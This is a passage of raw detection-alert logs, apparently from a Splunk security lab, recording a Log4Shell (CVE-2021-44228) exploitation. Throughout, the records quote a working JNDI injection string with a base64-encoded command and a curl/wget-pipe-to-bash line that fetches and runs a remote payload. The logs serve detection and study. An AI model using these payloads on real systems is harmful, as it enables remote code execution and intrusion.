http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646954, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="T1059", annotations._all="DE.AE", annotations._all="Actions on Objectives", annotations._all="PR.PT", annotations._all="CIS 13", annotations._all="Stage:Initial Access", annotations._all="PR.DS", annotations._all="DE.CM", annotations._all="Source:Endpoint", annotations._all="Command and Control", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="CIS 12", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642646952, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="Reconnaissance", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="CIS 16", annotations._all="Stage:Execution", annotations._all="CIS 3", annotations._all="CIS 5", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642646954, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="T1059", annotations._all="DE.AE", annotations._all="Actions on Objectives", annotations._all="PR.PT", annotations._all="CIS 13", annotations._all="Stage:Initial Access", annotations._all="PR.DS", annotations._all="DE.CM", annotations._all="Source:Endpoint", annotations._all="Command and Control", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="CIS 12", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642646952, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="Reconnaissance", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="CIS 16", annotations._all="Stage:Execution", annotations._all="CIS 3", annotations._all="CIS 5", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", 